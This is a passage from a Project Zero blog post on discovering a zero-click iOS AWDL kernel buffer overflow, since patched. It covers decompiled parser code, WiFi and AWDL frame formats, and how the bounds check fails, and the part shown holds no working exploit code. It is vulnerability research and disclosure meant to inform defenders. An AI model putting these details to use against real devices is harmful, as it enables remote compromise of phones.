An iOS zero-click radio proximity exploit odyssey


Posted by Ian Beer, Project Zero

NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 13.5 in May 2020.

In this demo I remotely trigger an unauthenticated kernel memory corruption vulnerability which causes all iOS devices in radio-proximity to reboot, with no user interaction. Over the next 30,000 words I’ll cover the entire process to go from this basic demo to successfully exploiting this vulnerability in order to run arbitrary code on any nearby iOS device and steal all the user data.

Quoting @halvarflake’s Offensivecon keynote from February 2020:

“Exploits are the closest thing to “magic spells” we experience in the real world: Construct the right incantation, gain remote control over device.”

For 6 months of 2020, while locked down in the corner of my bedroom surrounded by my lovely, screaming children, I’ve been working on a magic spell of my own. No, sadly not an incantation to convince the kids to sleep in until 9am every morning, but instead a wormable radio-proximity exploit which allows me to gain complete control over any iPhone in my vicinity. View all the photos, read all the email, copy all the private messages and monitor everything which happens on there in real-time.

The takeaway from this project should not be: no one will spend six months of their life just to hack my phone, I’m fine.

Instead, it should be: one person, working alone in their bedroom, was able to build a capability which would allow them to seriously compromise iPhone users they’d come into close contact with.

Imagine the sense of power an attacker with such a capability must feel. As we all pour more and more of our souls into these devices, an attacker can gain a treasure trove of information on an unsuspecting target.

What’s more, with directional antennas, higher transmission powers and sensitive receivers the range of such attacks can be considerable.

I have no evidence that these issues were exploited in the wild; I found them myself through manual reverse engineering. But we do know that exploit vendors seemed to take notice of these fixes. For example, take this tweet from Mark Dowd, the co-founder of Azimuth Security, an Australian “market-leading information security business”:

This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL

The vulnerability Mark is referencing here is one of the vulnerabilities I reported to Apple. You don’t notice a fix like that without having a deep interest in this particular code.

This Vice article from 2018 gives a good overview of Azimuth and why they might be interested in such vulnerabilities. You might trust that Azimuth’s judgement of their customers aligns with your personal and political beliefs, you might not, that’s not the point. Unpatched vulnerabilities aren’t like physical territory, occupied by only one side. Everyone can exploit an unpatched vulnerability and Mark Dowd wasn’t the only person to start tweeting about vulnerabilities in AWDL.

This has been the longest solo exploitation project I’ve ever worked on, taking around half a year. But it’s important to emphasize up front that the teams and companies supplying the global trade in cyberweapons like this one aren’t typically just individuals working alone. They’re well-resourced and focused teams of collaborating experts, each with their own specialization. They aren’t starting with absolutely no clue how Bluetooth or WiFi work. They also potentially have access to information and hardware I simply don’t have, like development devices, special cables, leaked source code, symbols files and so on.

Of course, an iPhone isn’t designed to allow people to build capabilities like this. So what went so wrong that it was possible? Unfortunately, it’s the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers.

In fact, this entire exploit uses just a single memory corruption vulnerability to compromise the flagship iPhone 11 Pro device. With just this one issue I was able to defeat all the mitigations in order to remotely gain native code execution and kernel memory read and write.

Relative to the size and complexity of these codebases of major tech companies, the sizes of the security teams dedicated to proactively auditing their product’s source code to look for vulnerabilities are very small. Android and iOS are complete custom tech stacks. It’s not just kernels and device drivers but dozens of attacker-reachable apps, hundreds of services and thousands of libraries running on devices with customized hardware and firmware.

Actually reading all the code, including every new line in addition to the decades of legacy code, is unrealistic, at least with the division of resources commonly seen in tech where the ratio of security engineers to developers might be 1:20, 1:40 or even higher.

To tackle this insurmountable challenge, security teams rightly place a heavy emphasis on design level review of new features. This is good: getting stuff right at the design phase can help limit the impact of the mistakes and bugs which will inevitably occur. For example, ensuring that a new hardware peripheral like a GPU can only ever access a restricted portion of physical memory helps constrain the worst-case outcome if the GPU is compromised by an attacker. The attacker is hopefully forced to find an additional vulnerability to “lengthen the exploit chain”, having to use an ever-increasing number of vulnerabilities to hack a single device. Retrofitting constraints like this to already-shipping features would be much harder, if not impossible.

In addition to design-level reviews, security teams tackle the complexity of their products by attempting to constrain what an attacker might be able to do with a vulnerability. These are mitigations. They take many forms and can be general, like stack cookies, or application specific, like Structure ID in JavaScriptCore. The guarantees which can be made by mitigations are generally weaker than those made by design-level features but the goal is similar: to “lengthen the exploit chain”, hopefully forcing an attacker to find a new vulnerability and incur some cost.

The third approach widely used by defensive teams is fuzzing, which attempts to emulate an attacker’s vulnerability finding process with brute force. Fuzzing is often misunderstood as an effective method to discover easy-to-find vulnerabilities or “low-hanging fruit”. A more precise description would be that fuzzing is an effective method to discover easy-to-fuzz vulnerabilities. Plenty of vulnerabilities which a skilled vulnerability researcher would consider low-hanging fruit can require reaching a program point that no fuzzer today will be able to reach, no matter the compute resources used.

The problem for tech companies, and certainly not unique to Apple, is that while design review, mitigations, and fuzzing are necessary for building secure codebases, they are far from sufficient.

Fuzzers cannot reason about code in the same way a skilled vulnerability researcher can. This means that without concerted manual effort, vulnerabilities with a relatively low cost-of-discovery remain fairly prevalent. A major focus of my work over the last few years has been attempting to highlight that the iOS codebase, just like any other major modern operating system, has a high vulnerability density. Not only that, but there’s a high density of “good bugs”, that is, vulnerabilities which enable the creation of powerful weird machines.

This notion of “good bugs” is something that offensive researchers understand intuitively but something which might be hard to grasp for those without an exploit development background. Thomas Dullien’s weird machines paper provides the best introduction to the notion of weird machines and their applicability to exploitation. Given a sufficiently complex state machine operating on attacker-controlled input, a “good bug” allows the attacker-controlled input to instead become “code”, with the “good bug” introducing a new, unexpected state transition into a new, unintended state machine. The art of exploitation then becomes the art of determining how one can use vulnerabilities to introduce sufficiently powerful new state transitions such that, as an end goal, the attacker-supplied input becomes code for a new, weird machine capable of arbitrary system interactions.

It’s with this weird machine that mitigations will be defeated; even a mitigation without implementation flaws is usually no match for a sufficiently powerful weird machine. An attacker looking for vulnerabilities is looking specifically for weird machine primitives. Their auditing process is focused on a particular attack surface and particular vulnerability classes. This stands in stark contrast to a product security team with responsibility for every possible attack surface and every vulnerability class.

As things stand now in November 2020, I believe it’s still quite possible for a motivated attacker with just one vulnerability to build a sufficiently powerful weird machine to completely, remotely compromise top-of-the-range iPhones. In fact, the parts of that process which are hardest probably aren’t those which you might expect, at least not without an appreciation for weird machines.

Vulnerability discovery remains a fairly linear function of time invested. Defeating mitigations remains a matter of building a sufficiently powerful weird machine. Concretely, Pointer Authentication Codes (PAC) meant I could no longer take the popular direct shortcut to a very powerful weird machine via trivial program counter control and ROP or JOP. Instead I built a remote arbitrary memory read and write primitive which in practice is just as powerful and something which the current implementation of PAC, which focuses almost exclusively on restricting control-flow, wasn’t designed to mitigate.

Secure system design didn’t save the day because of the inevitable tradeoffs involved in building shippable products. Should such a complex parser driving multiple, complex state machines really be running in kernel context against untrusted, remote input? Ideally, no, and this was almost certainly flagged during a design review. But there are tight timing constraints for this particular feature which means isolating the parser is non-trivial. It’s certainly possible, but that would be a major engineering challenge far beyond the scope of the feature itself. At the end of the day, it’s features which sell phones and this feature is undoubtedly very cool; I can completely understand the judgement call which was made to allow this design despite the risks.

But risk means there are consequences if things don’t go as expected. When it comes to software vulnerabilities it can be hard to connect the dots between those risks which were accepted and the consequences. I don’t know if I’m the only one who found these vulnerabilities, though I’m the first to tell Apple about them and work with Apple to fix them. Over the next 30,000 words I’ll show you what I was able to do with a single vulnerability in this attack surface and hopefully give you a new or renewed insight into the power of the weird machine.

I don’t think all hope is lost; there’s just an awful lot more left to do. In the conclusion I’ll try to share some ideas for what I think might be required to build a more secure iPhone.

If you want to follow along you can find details attached to issue 1982 in the Project Zero issue tracker.

In 2018 Apple shipped an iOS beta build without stripping function name symbols from the kernelcache. While this was almost certainly an error, events like this help researchers on the defending side enormously. One of the ways I like to procrastinate is to scroll through this enormous list of symbols, reading bits of assembly here and there. One day I was looking through IDA’s cross-references to memmove with no particular target in mind when something jumped out as being worth a closer look:

IDA Pro’s cross references window shows a large number of calls to memmove. A callsite in IO80211AWDLPeer::parseAwdlSyncTreeTLV is highlighted

Having function names provides a huge amount of missing context for the vulnerability researcher. A completely stripped 30+MB binary blob such as the iOS kernelcache can be overwhelming. There’s a huge amount of work to determine how everything fits together. What bits of code are exposed to attackers? What sanity checking is happening and where? What execution context are different parts of the code running in?

In this case this particular driver is also available on MacOS, where function name symbols are not stripped.

There are three things which made this highlighted function stand out to me:

1) The function name:

IO80211AWDLPeer::parseAwdlSyncTreeTLV

At this point, I had no idea what AWDL was. But I did know that TLVs (Type, Length, Value) are often used to give structure to data, and parsing a TLV might mean it’s coming from somewhere untrusted. And the 80211 is a giveaway that this probably has something to do with WiFi. Worth a closer look. Here’s the raw decompilation from Hex-Rays which we’ll clean up later:

__int64 __fastcall IO80211AWDLPeer::parseAwdlSyncTreeTLV(__int64 this, __int64 buf)
{
  const void *v3; // x20
  _DWORD *v4; // x21
  int v5; // w8
  unsigned __int16 v6; // w25
  unsigned __int64 some_u16; // x24
  int v8; // w21
  __int64 v9; // x8
  __int64 v10; // x9
  unsigned __int8 *v11; // x21

  v3 = (const void *)(buf + 3);
  v4 = (_DWORD *)(this + 1203);
  v5 = *(_DWORD *)(this + 1203);
  if ( ((v5 + 1) & 0xFFFFu) <= 0xA )
    v6 = v5 + 1;
  else
    v6 = 10;
  some_u16 = *(unsigned __int16 *)(buf + 1) / 6uLL;
  if ( (_DWORD)some_u16 == v6 )
  {
    some_u16 = v6;
  }
  else
  {
    IO80211Peer::logDebug(
      this,
      0x8000000000000uLL,
      "Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u\n",
      *(unsigned __int8 *)(this + 32),
      *(unsigned __int8 *)(this + 33),
      *(unsigned __int8 *)(this + 34),
      *(unsigned __int8 *)(this + 35),
      *(unsigned __int8 *)(this + 36),
      *(unsigned __int8 *)(this + 37),
      v6,
      some_u16);
    *v4 = some_u16;
    v6 = some_u16;
  }
  v8 = memcmp((const void *)(this + 5520), v3, (unsigned int)(6 * some_u16));
  memmove((void *)(this + 5520), v3, (unsigned int)(6 * some_u16));

Definitely looks like it’s parsing something. There’s some fiddly byte manipulation; something which sort of looks like a bounds check and an error message.

2) The second thing which stands out is the error message string:

"Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u\n"

Any kind of LENGTH error sounds like fun to me. Especially when you look a little closer…

3) The control flow graph.

Reading the code a bit more closely it appears that although the log message contains the word “error” there’s nothing which is being treated as an error condition here. IO80211Peer::logDebug isn’t a fatal logging API, it just logs the message string. Tracing back the length value which is passed to memmove, regardless of which path is taken we still end up with what looks like an arbitrary u16 value from the input buffer (rounded down to the nearest multiple of 6) passed as the length argument to memmove.
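The length arithmetic described above can be modelled in isolation. The following is a minimal sketch, not Apple's code: the function names are invented for illustration, and the destination capacity passed to the checked variant is an assumed parameter, since nothing at this point tells us how large the destination at this + 5520 really is.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of the length handed to memmove in the decompilation:
 * the u16 length from the input buffer is divided by 6 and multiplied back,
 * which only rounds it down to a multiple of 6. */
size_t sync_tree_copy_len(uint16_t tlv_len)
{
    size_t entries = tlv_len / 6u;  /* number of 6-byte entries claimed */
    return 6u * entries;            /* still derived purely from the input */
}

/* What a bounds check could look like. dst_capacity is an assumption made
 * for this sketch. Returns 0 and stores the length on success, or -1 if
 * the copy would not fit in the destination. */
int sync_tree_copy_len_checked(uint16_t tlv_len, size_t dst_capacity,
                               size_t *out_len)
{
    size_t len = sync_tree_copy_len(tlv_len);
    if (len > dst_capacity)
        return -1;
    *out_len = len;
    return 0;
}
```

With the largest possible u16 input the unchecked helper still yields a copy length of tens of kilobytes, which is the behaviour the control flow above suggests; the checked variant shows the kind of test that appears to be missing on both paths.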

Can it really be this easy? Typically, in my experience, bugs this shallow in real attack surfaces tend to not work out. There’s usually a length check somewhere far away; you’ll spend a few days trying to work out why you can’t seem to reach the code with a bad size until you find it and realize this was a CVE from a decade ago. Still, worth a try.

But what even is this attack surface?

A bit of googling later we learn that awdl is a type of Welsh poetry, and also an acronym for an Apple-proprietary mesh networking protocol probably called Apple Wireless Direct Link. It appears to be used by AirDrop amongst other things.

The first goal is to determine whether we can really trigger this vulnerability remotely.

We can see from the casts in the parseAwdlSyncTreeTLV method that the type-length-value objects have a single-byte type then a two-byte length followed by a payload value.

In IDA selecting the function name and going View -> Open subviews -> Cross references (or pressing ‘x’) shows IDA only found one caller of this method:

IO80211AWDLPeer::actionFrameReport

      case 0x14u:
        if (v109[20] >= 2)
          goto LABEL_126;
        ++v109[0x14];
        IO80211AWDLPeer::parseAwdlSyncTreeTLV(this, bytes);

So 0x14 is probably the type value, and v109 looks like it’s probably counting the number of these TLVs.

Looking in the list of function names we can also see that there’s a corresponding BuildSyncTreeTlv method. If we could get two machines to join an AWDL network, could we just use the MacOS kernel debugger to make the SyncTree TLV very large before it’s sent?

Yes, you can. Using two MacOS laptops and enabling AirDrop on both of them I used a kernel debugger to edit the SyncTree TLV sent by one of the laptops, which caused the other one to kernel panic due to an out-of-bounds memmove.

If you’re interested in exactly how to do that take a look at the original vulnerability report I sent to Apple on November 29th 2019. This vulnerability was fixed as CVE-2020-3843 on January 28th 2020 in iOS 13.3.1/MacOS 10.15.3.

Our journey is only just beginning. Getting from here to running an implant on an iPhone 11 Pro with no user interaction is going to take a while…

There are a series of papers from the Secure Mobile Networking Lab at TU Darmstadt in Germany (also known as SEEMOO) which look at AWDL. The researchers there have done a considerable amount of reverse engineering (in addition to having access to some leaked Broadcom source code) to produce these papers; they are invaluable for understanding AWDL and pretty much the only resources out there.

The first paper, One Billion Apples’ Secret Sauce: Recipe for the Apple Wireless Direct Link Ad hoc Protocol, covers the format of the frames used by AWDL and the operation of the channel-hopping mechanism.

The second paper, A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link, focuses more on Airdrop, one of the OS features which uses AWDL. This paper also examines how Airdrop uses Bluetooth Low Energy advertisements to enable AWDL interfaces on other devices.

The research group wrote an open source AWDL client called OWL (Open Wireless Link). Although I was unable to get OWL to work it was nevertheless an invaluable reference and I did use some of their frame definitions.

AWDL is an Apple-proprietary mesh networking protocol designed to allow Apple devices like iPhones, iPads, Macs and Apple Watches to form ad-hoc peer-to-peer mesh networks. Chances are that if you own an Apple device you’re creating or connecting to these transient mesh networks multiple times a day without even realizing it.

If you’ve ever used Airdrop, streamed music to your Homepod or Apple TV via Airplay or used your iPad as a secondary display with Sidecar then you’ve been using AWDL. And even if you haven’t been using those features, if people nearby have been then it’s quite possible your device joined the AWDL mesh network they were using anyway.

AWDL isn’t a custom radio protocol; the radio layer is WiFi (specifically 802.11g and 802.11a).

Most people’s experience with WiFi involves connecting to an infrastructure network. At home you might plug a WiFi access point into your modem which creates a WiFi network. The access point broadcasts a network name and accepts clients on a particular channel.

To reach other devices on the internet you send WiFi frames to the access point (1). The access point sends them to the modem (2) and the modem sends them to your ISP (3,4) which sends them to the internet:

The topology of a typical home network

To reach other devices on your home WiFi network you send WiFi frames to the access point and the access point relays them to the other devices:

WiFi clients communicate via an access point, even if they are within WiFi range of each other

In reality the wireless signals don’t propagate as straight lines between the client and access point but spread out in space such that the two client devices may be able to see the frames transmitted by each other to the access point.

If WiFi client devices can already send WiFi frames directly to each other, then why have the access point at all? Without the complexity of the access point you could certainly have much more magical experiences which “just work”, requiring no physical setup.

There are various protocols for doing just this, each with their own tradeoffs. Tunneled Direct Link Setup (TDLS) allows two devices already on the same WiFi network to negotiate a direct connection to each other such that frames won’t be relayed by the access point.

Wi-Fi Direct allows two devices not already on the same network to establish an encrypted peer-to-peer Wi-Fi network, using WPS to bootstrap a WPA2-encrypted ad-hoc network.

Apple’s AWDL doesn’t require peers to already be on the same network to establish a peer-to-peer connection, but unlike Wi-Fi Direct, AWDL has no built-in encryption. Unlike TDLS and Wi-Fi Direct, AWDL networks can contain more than two peers and they can also form a mesh network configuration where multiple hops are required.

AWDL has one more trick up its sleeve: an AWDL client can be connected to an AWDL mesh network and a regular AP-based infrastructure network at the same time, using only one Wi-Fi chipset and antenna. To see how that works we need to look a little more at some Wi-Fi fundamentals.

Property                             TDLS    Wi-Fi Direct    AWDL
Requires AP network                  Yes     No              No
Encrypted                            Yes     Yes             No
Peer Limit                           2       2               Unlimited
Concurrent AP Connection Possible    No      No              Yes

There are over 20 years of WiFi standards spanning different frequency ranges of the electromagnetic spectrum, from as low as 54 MHz in 802.11af up to over 60 GHz in 802.11ad. Such networks are quite esoteric and consumer equipment uses frequencies near 2.4 GHz or 5 GHz. Ranges of frequencies are split into channels: for example in 802.11g channel 6 means a 22 MHz range between 2.426 GHz and 2.448 GHz.

Newer 5 GHz standards like 802.11ac allow for wider channels up to 160 MHz; 5 GHz channel numbers therefore encode both the center frequency and channel width. Channel 44 is a 20 MHz range between 5.210 GHz and 5.230 GHz whereas channel 46 is a 40 MHz range which starts at the same lower frequency as channel 44 of 5.210 GHz but extends up to 5.250 GHz.
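The channel arithmetic in the two paragraphs above can be checked with a few lines of C. This is a small sketch under stated assumptions: the helper names and the struct are invented here, the center frequency rules used are the conventional ones (2407 + 5n MHz in the 2.4 GHz band, 5000 + 5n MHz in the 5 GHz band), the channel width is supplied by the caller rather than derived from the channel number, and the special case of 2.4 GHz channel 14 is not handled.

```c
#include <stdint.h>

/* A frequency range in MHz, inclusive of both edges. */
struct freq_range_mhz {
    uint32_t low;
    uint32_t high;
};

/* Center frequency in MHz for a channel number (channel 14 not handled). */
uint32_t channel_center_mhz(int is_5ghz, uint32_t channel)
{
    return (is_5ghz ? 5000u : 2407u) + 5u * channel;
}

/* Lower and upper edge of a channel, given its width in MHz. */
struct freq_range_mhz channel_range_mhz(int is_5ghz, uint32_t channel,
                                        uint32_t width_mhz)
{
    uint32_t center = channel_center_mhz(is_5ghz, channel);
    struct freq_range_mhz range = { center - width_mhz / 2u,
                                    center + width_mhz / 2u };
    return range;
}
```

Calling channel_range_mhz(0, 6, 22) gives 2426 to 2448 MHz, channel_range_mhz(1, 44, 20) gives 5210 to 5230 MHz and channel_range_mhz(1, 46, 40) gives 5210 to 5250 MHz, matching the figures quoted in the text.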

AWDL typically sends and receives frames on channel 6 and 44. How does that work if you’re also using your home WiFi network on a different channel?

In order to appear to be connected to two separate networks on separate frequencies at the same time, AWDL-capable devices split time into 16ms chunks and tell the WiFi controller chip to quickly switch between the channel for the infrastructure network and the channel being used by AWDL:

A typical AWDL channel hopping sequence, alternating between small periods on AWDL social channels and longer periods on the AP channel

The actual channel sequence is dynamic. Peers broadcast their channel sequences and adapt their own sequence to match peers with which they wish to communicate. The periods when an AWDL peer is listening on an AWDL channel are known as Availability Windows.
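As a rough mental model of the time slicing, the radio's channel at any instant can be looked up from a repeating schedule of 16ms slots. The sketch below is a deliberate simplification: the function name, the fixed repeating array and the example AP channel are assumptions for illustration, whereas the real sequence is dynamic and negotiated between peers as described above.

```c
#include <stddef.h>
#include <stdint.h>

#define SLOT_MS 16u  /* slot length taken from the text */

/* Return the channel the radio would be tuned to at time now_ms, given a
 * repeating schedule with one channel number per slot. The caller must
 * pass slots > 0. */
uint8_t channel_at(const uint8_t *sequence, size_t slots, uint64_t now_ms)
{
    size_t slot = (size_t)((now_ms / SLOT_MS) % slots);
    return sequence[slot];
}
```

For example, with a hypothetical schedule of {6, 44, 36, 36}, where 36 stands in for the AP channel, the radio spends the first 16ms on channel 6, the next 16ms on channel 44 and the following 32ms on the AP channel before the pattern repeats.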

In this way the device can appear to be connected to the access point whilst also participating in the AWDL mesh at the same time. Of course, frames might be missed from both the AP and the AWDL mesh but the protocols are treating radio as an unreliable transport anyway so this only really has an impact on throughput. A large part of the AWDL protocol involves trying to synchronize the channel switching between peers to improve throughput.

The SEEMOO labs paper has a much more detailed look at the AWDL channel hopping mechanism.

These are the first software-controlled fields which go over the air in a WiFi frame:

struct ieee80211_hdr {
  uint16_t frame_control;
  uint16_t duration_id;
  struct ether_addr dst_addr;
  struct ether_addr src_addr;
  struct ether_addr bssid_addr;
  uint16_t seq_ctrl;
} __attribute__((packed));

The first word contains fields which define the type of this frame. These are broadly split into three frame families: Management, Control and Data. The building blocks of AWDL use a subtype of Management frames called Action frames.

The address fields in an 802.11 header can have different meanings depending on the context; for our purposes the first is the destination device MAC address, the second is the source device MAC and the third is the MAC address of the infrastructure network access point or BSSID.

Since AWDL is a peer-to-peer network and doesn’t use an access point, the BSSID field of an AWDL frame is set to the hard-coded AWDL BSSID MAC of 00:25:00:ff:94:73. It’s this BSSID which AWDL clients are looking for when they’re trying to find other peers. Your router won’t accidentally use this BSSID because Apple owns the 00:25:00 OUI.

The format of the bytes following the header depends on the frame type. For an Action frame the next byte is a category field. There are a large number of categories which allow devices to exchange all kinds of information. For example category 5 covers various types of radio measurements like noise histograms.

The special category value 0x7f defines this frame as a vendor-specific action frame, meaning that the next three bytes are the OUI of the vendor responsible for this custom action frame format.

Apple owns the OUI 0x00 0x17 0xf2 and this is the OUI used for AWDL action frames. Every byte in the frame after this is now proprietary, defined by Apple rather than an IEEE standard.
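Putting the last few paragraphs together, a receiver could recognise a candidate AWDL action frame with a handful of byte comparisons. This is an illustrative sketch rather than the driver's logic: the function name is invented, the offsets assume the 24-byte header shown above with no extra header fields, and the frame control test relies on the standard 802.11 encoding in which a Management frame of subtype Action has 0xd0 in its first byte.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HDR_LEN 24u  /* frame_control, duration_id, 3 addresses, seq_ctrl */

const uint8_t AWDL_BSSID[6] = {0x00, 0x25, 0x00, 0xff, 0x94, 0x73};
const uint8_t APPLE_OUI[3]  = {0x00, 0x17, 0xf2};

/* Returns 1 if the buffer looks like a vendor-specific action frame carrying
 * the AWDL BSSID and Apple's OUI, 0 otherwise. */
int looks_like_awdl_action_frame(const uint8_t *frame, size_t len)
{
    if (len < HDR_LEN + 4u)
        return 0;                        /* too short for category + OUI */
    if ((frame[0] & 0xfc) != 0xd0)
        return 0;                        /* not Management/Action */
    if (memcmp(frame + 16, AWDL_BSSID, sizeof AWDL_BSSID) != 0)
        return 0;                        /* third address is the BSSID */
    if (frame[HDR_LEN] != 0x7f)
        return 0;                        /* category: vendor specific */
    return memcmp(frame + HDR_LEN + 1, APPLE_OUI, sizeof APPLE_OUI) == 0;
}
```

Everything after those 28 bytes is the proprietary part, so a check like this says nothing about whether the remaining payload is well formed.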

The SEEMOO labs team have done a great job reversing the AWDL action frame format and they developed a wireshark dissector.

AWDL Action frames have a fixed-sized header followed by a variable length collection of TLVs:

The layout of fields in an AWDL frame: 802.11 header, action frame header, AWDL fixed header and variable length AWDL payload

Each TLV has a single-byte type followed by a two-byte length which is the length of the variable-sized payload in bytes.
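A defensive walk over such a TLV collection might look like the sketch below. The names are invented for illustration, and the little-endian length is an inference from the decompilation's direct 16-bit load at buf + 1 on a little-endian CPU rather than something stated by a specification. The point of the sketch is that each claimed length is validated against the bytes actually remaining before the payload is touched.

```c
#include <stddef.h>
#include <stdint.h>

/* Callback invoked once per well-formed TLV. */
typedef void (*tlv_cb)(uint8_t type, const uint8_t *value, uint16_t len,
                       void *ctx);

/* Walk a buffer of TLVs (1-byte type, 2-byte little-endian length, payload).
 * Returns the number of TLVs visited, or -1 if a TLV claims more bytes than
 * remain or if trailing bytes are left over. cb may be NULL. */
int walk_tlvs(const uint8_t *buf, size_t size, tlv_cb cb, void *ctx)
{
    size_t off = 0;
    int count = 0;

    while (size - off >= 3) {
        uint8_t type = buf[off];
        uint16_t len = (uint16_t)(buf[off + 1] | (buf[off + 2] << 8));
        off += 3;
        if (len > size - off)
            return -1;                   /* length exceeds remaining data */
        if (cb)
            cb(type, buf + off, len, ctx);
        off += len;
        count++;
    }
    return off == size ? count : -1;
}
```

Checking only that the payload lies inside the received frame is necessary but not sufficient: each individual TLV handler still has to compare the length against whatever fixed-size destination it copies into.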

There are two types of AWDL action frame: Master Indication Frames (MIF) and Periodic Synchronization Frames (PSF). They differ only in their type field and the collection of TLVs they contain.

An AWDL mesh network has a single master node decided by an election process. Each node broadcasts a MIF containing a master metric parameter; the node with the highest metric becomes the master node. It’s this master node’s PSF timing values which should be adopted as the true timing values for all the other nodes to synchronize to; in this way their availability windows can overlap and the network can have a higher throughput.
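The election rule itself is simple to express. The sketch below only illustrates "highest metric wins"; the struct, the 32-bit metric width and the tie-breaking rule (the earliest entry wins) are assumptions made for the example and are not taken from the protocol.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical record of what one node advertised in its MIF. */
struct peer_metric {
    uint8_t  mac[6];
    uint32_t master_metric;  /* width is an assumption */
};

/* Return the index of the node with the highest master metric, or -1 if
 * the list is empty. Ties go to the earliest entry (an assumption). */
int elect_master(const struct peer_metric *nodes, size_t n)
{
    int best = -1;
    for (size_t i = 0; i < n; i++) {
        if (best < 0 || nodes[i].master_metric > nodes[best].master_metric)
            best = (int)i;
    }
    return best;
}
```

Every other node would then adopt the timing values from the elected node's PSFs so that the availability windows line up.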

Back in 2017, Project Zero researcher Gal Beniamini published a seminal 5-part blog post series entitled Over The Air where he exploited a vulnerability in the Broadcom WiFi chipset to gain native code execution on the WiFi controller, then pivoted via an iOS kernel bug in the chipset-to-Application Processor interface to achieve arbitrary kernel memory read/write.

In that case, Gal targeted a vulnerability in the Broadcom firmware when it was parsing data structures related to TDLS. The raw form of these data structures was handled by the chipset firmware itself and never made it to the application processor.

In contrast, for AWDL the frames appear to be parsed in their entirety on the Application Processor by the kernel driver. Whilst this means we can explore a lot of the AWDL code, it also means that we’re going to have to build the entire exploit on top of primitives we can build with the AWDL parser, and those primitives will have to be powerful enough to remotely compromise the device. Apple continues to ship new mitigations with each iOS release and hardware revision, and we’re of course going to target the latest iPhone 11 Pro with the largest collection of these mitigations in place.

Can we really build something powerful enough to remotely defeat kernel pointer authentication just with a linear heap overflow in a WiFi frame parser? Defeating mitigations usually involves building up a library of tricks to help build more and more powerful primitives. You might start with a linear heap overflow and use it to build an arbitrary read, then use that to help build an arbitrary bit flip primitive and so on.

I’ve built a library of tricks and techniques like this for doing local privilege escalations on iOS, but I’ll have to start again from scratch for this brand new attack surface.

The first two C++ classes to familiarize ourselves with are IO80211AWDLPeer and IO80211AWDLPeerManager. There is one IO80211AWDLPeer object for each AWDL peer which a device has recently received a frame from. A background timer destroys inactive IO80211AWDLPeer objects. There is a single instance of the IO80211AWDLPeerManager, which is responsible for orchestrating interactions between this device and other peers.

Note that although we have some function names from the iOS 12 beta 1 kernelcache and the MacOS IO80211Family driver, we don’t have object layout information. Brandon Azad pointed out that the MacOS prelinked kernel image does contain some structure layout information in the __CTF.__ctf section which can be parsed by the dtrace ctfdump tool. Unfortunately this seems to only contain structures from the open source XNU code.

The sizes of OSObject-based IOKit objects can easily be determined statically, but the names and types of individual fields cannot. One of the most time-consuming tasks of this whole project was the painstaking process of reverse engineering the types and meanings of a huge number of the fields in these objects. Each IO80211AWDLPeer object is almost 6KB; that’s a lot of potential fields. Having structure layout information would probably have saved months.

If you’re a defender building a threat model, don’t interpret this the wrong way: I would assume any competent real-world exploit development team has this information, either from images or devices with full debug symbols they have acquired with or without Apple’s consent, from insider access, or even just from monitoring every single firmware image ever publicly released to check whether debug symbols were released by accident. Larger groups could even have people dedicated to building custom reversing tools.

Six years ago I had hoped Project Zero would be able to get legitimate access to data sources like this. Six years later and I’m still spending months reversing structure layouts and naming variables.

We’ll take IO80211AWDLPeerManager::actionFrameInput as the point where untrusted raw AWDL frame data starts being parsed. There is actually a separate, earlier processing layer in the WiFi chipset driver but its parsing is minimal.

Each frame received while the device is listening on a social channel which was sent to the AWDL BSSID ends up at actionFrameInput, wrapped in an mbuf structure. Mbufs are an anachronistic data structure used for wrapping collections of networking buffers. The mbuf API is the stuff of nightmares, but that’s not in scope for this blogpost.

The mbuf buffers are concatenated to get a contiguous frame in memory for parsing, then IO80211PeerManager::findPeer is called, passing the source MAC address from the received frame:

IO80211AWDLPeer*
IO80211PeerManager::findPeer(struct ether_addr *peer_mac)

If an AWDL frame has recently been received from this source MAC then this function returns a pointer to an existing IO80211AWDLPeer structure representing the peer with that MAC. The IO80211AWDLPeerManager uses a fairly complicated priority queue data structure called IO80211CommandQueue to store pointers to these currently active peers.

If the peer isn’t found in the IO80211AWDLPeerManager’s queue of peers then a new IO80211AWDLPeer object is allocated to represent this new peer and it’s inserted into the IO80211AWDLPeerManager’s peers queue.

Once a suitable peer object has been found the IO80211AWDLPeerManager then calls the actionFrameReport method on the IO80211AWDLPeer so that it can handle the action frame.

This method is responsible for most of the AWDL action frame handling and contains most of the untrusted parsing. It first updates some timestamps then reads various fields from TLVs in the frame using the IO80211AWDLPeerManager::getTlvPtrForType method to extract them directly from the mbuf. After this initial parsing comes the main loop which takes each TLV in turn and parses it.

First each TLV is passed to IO80211AWDLPeer::tlvCheckBounds. This method has a hardcoded list of specific minimum and maximum TLV lengths for some of the supported TLV types. For types not explicitly listed it enforces a maximum length of 1024 bytes. I mentioned earlier that I often encounter code constructs which look like shallow memory corruption only to later discover a bounds check far away. This is exactly that kind of construct, and is in fact where Apple added a bounds check in the patch.

Type 0x14 (which has the vulnerability in the parser) isn’t explicitly listed in tlvCheckBounds so it gets the default upper length limit of 1024, significantly larger than the 60 byte buffer allocated for the destination buffer in the IO80211AWDLPeer structure.

This pattern of separating bounds checks away from parsing code is fragile; it’s too easy to forget or not realize that when adding code for a new TLV type it’s also a requirement to update the tlvCheckBounds function. If this pattern is used, try to come up with a way to enforce that new code must explicitly declare an upper bound here. One option could be to ensure an enum is used for the type and wrap the tlvCheckBounds method in a pragma to temporarily enable clang’s -Wswitch-enum warning as an error:

#pragma clang diagnostic push
#pragma clang diagnostic error "-Wswitch-enum"

IO80211AWDLPeer::tlvCheckBounds(…) {
  switch(tlv->type) {
    case type_a:
      …;
    case type_b:
      …;
  }
}

#pragma clang diagnostic pop

This causes a compilation error if the switch statement doesn’t have an explicit case statement for every value of the tlv->type enum.

Static analysis tools like Semmle can also help here. The EnumSwitch class can be used, as in this example code, to check whether all enum values are explicitly handled.

If the tlvCheckBounds checks pass then there is a switch statement with a case to parse each supported TLV:

